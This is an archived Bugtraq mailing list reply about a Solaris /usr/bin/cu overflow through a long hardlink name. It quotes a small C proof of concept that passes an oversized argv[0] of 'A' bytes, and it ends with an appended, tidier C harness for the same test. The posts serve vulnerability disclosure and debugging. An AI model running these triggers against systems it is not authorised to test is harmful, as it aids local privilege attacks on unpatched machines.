Bugtraq mailing list archives
Re: Solaris /usr/bin/cu Vulnerability
From: optyx <optyx () UBERHAX0R NET>
Date: Tue, 30 Jan 2001 12:01:10 -0800
Dan Harkless <dan-bugtraq () DILVISH SPEED NET> wrote:
> Are you implying the above patches fix the cu long hardlink name
> vulnerability? This is not the case, at least on 2.6:
>
> # cat > cu_exploit.c
> #include <stdio.h>
> #include <stdlib.h>   /* malloc, atoi */
> #include <string.h>   /* memset */
> #include <unistd.h>   /* execl */
>
> /* Exec /usr/bin/cu with an argv[0] of (argv[1] - 1) 'A' bytes.
>  * argv[1] is used without checking argc. */
> void main(int argc, char **argv)
> {
>     char *buf;
>
>     buf = (char *) malloc(atoi(argv[1]) * sizeof(char));
>     memset(buf, 0x41, atoi(argv[1]) - 1);
>     buf[atoi(argv[1]) - 1] = 0;
>     execl("/usr/bin/cu", buf, (char *)0);
> }
> # gcc cu_exploit.c
> cu_exploit.c: In function `main':
> cu_exploit.c:4: warning: return type of `main' is not `int'
> # a.out
> Segmentation fault
See that atoi(argv[1])? a.out crashed, not /usr/bin/cu. Try a.out 4000 or whatever number next time, or trace through it with gdb.

-Optyx, Uberhax0r Communications
http://www.uberhax0r.net, leeter than dog
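As an added example (not code from either poster), the same kind of test harness written so that its own argument is validated and the child's exit status is reported through waitpid, so a segmentation fault can be attributed to the target rather than to the harness; the target path on the command line and the 1000000 byte length cap are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Validate the requested argv[0] length: 0 on success, -1 if the argument
 * is missing, non-numeric, zero or above the (assumed) 1000000 byte cap. */
int parse_length(const char *arg, size_t *out)
{
    char *end; unsigned long v;
    if (arg == NULL || *arg == '\0')
        return -1;
    v = strtoul(arg, &end, 10);   /* overflow yields ULONG_MAX, caught below */
    if (*end != '\0' || v == 0 || v > 1000000UL)
        return -1;
    *out = (size_t)v;
    return 0;
}

/* Fork and exec `path` with an argv[0] of `len` 'A' bytes; returns the child's
 * exit code, 128 + signal number if killed, -1 if the harness itself failed. */
int run_target(const char *path, size_t len)
{
    char *name = malloc(len + 1);
    pid_t pid; int status;
    if (name == NULL) return -1;
    memset(name, 'A', len);
    name[len] = '\0';
    pid = fork();
    if (pid == 0) {
        execl(path, name, (char *)NULL);
        _exit(127);               /* exec failed in the child */
    }
    free(name);
    if (pid < 0 || waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFSIGNALED(status) ? 128 + WTERMSIG(status) : WEXITSTATUS(status);
}

int main(int argc, char **argv)
{
    size_t len;
    if (argc != 3 || parse_length(argv[2], &len) != 0) {
        fprintf(stderr, "usage: %s target argv0-length\n", argv[0]);
        return 2;
    }
    printf("%s ended with status %d\n", argv[1], run_target(argv[1], len));
    return 0;
}
```

A status of 139 (128 + SIGSEGV) from the child means the target itself crashed; a usage error or a harness return of -1 means the test never reached the target.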